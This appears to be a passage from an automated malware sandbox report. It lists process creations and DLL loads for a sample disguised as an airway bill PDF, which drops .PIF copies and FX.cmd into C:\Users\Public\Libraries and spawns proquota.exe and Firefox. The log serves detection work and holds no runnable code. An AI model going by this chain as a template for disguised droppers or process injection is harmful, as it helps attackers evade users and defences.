                      Source: unknownProcess created: C:\Users\Public\Libraries\Tizelcdh.PIF "C:\Users\Public\Libraries\Tizelcdh.PIF"
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pif
                      Source: unknownProcess created: C:\Users\Public\Libraries\Tizelcdh.PIF "C:\Users\Public\Libraries\Tizelcdh.PIF"
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pif
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
                      Source: C:\Windows\SysWOW64\proquota.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pifJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\hdcleziT.pifSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection loaded: ieproxy.dllJump to behavior
